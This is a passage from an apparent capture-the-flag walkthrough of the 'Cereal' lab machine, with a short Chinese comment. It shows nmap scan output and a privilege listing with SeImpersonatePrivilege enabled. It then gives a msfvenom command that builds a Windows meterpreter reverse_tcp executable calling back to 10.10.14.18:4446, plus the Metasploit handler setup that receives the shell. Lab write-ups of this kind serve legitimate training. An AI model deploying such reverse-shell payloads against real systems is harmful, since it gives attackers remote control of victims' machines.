$ nmap -sC -sV 10.10.10.217 Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-18 16:24 CST Nmap scan report for 10.10.10.217 Host is up (0.076s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0) | ssh-hostkey: | 2048 08:8e:fe:04:8c:ad:6f:df:88:c7:f3:9a:c5:da:6d:ac (RSA) | 256 fb:f5:7b:a1:68:07:c0:7b:73:d2:ad:33:df:0a:fc:ac (ECDSA) |_ 256 cc:0e:70:ec:33:42:59:78:31:c0:4e:c2:a5:c9:0e:1e (ED25519) 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: Did not follow redirect to https://10.10.10.217/ 443/tcp open ssl/http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: Cereal | ssl-cert: Subject: commonName=cereal.htb | Subject Alternative Name: DNS:cereal.htb, DNS:source.cereal.htb | Not valid before: 2020-11-11T19:57:18 |_Not valid after: 2040-11-11T20:07:19 |_ssl-date: 2021-01-18T08:25:57+00:00; 0s from scanner time. | tls-alpn: |_ http/1.1 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 78.75 seconds
Privilege Name Description State ============================= ========================================= ======== SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
meterpreter
方便操作可以加载个meterpreter:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
#local msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=4446 -b "\x00\x0a" -a x64 --platform windows -f exe -o miao.exe
msfconsole -q use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 10.10.14.18 set LPORT 4446 run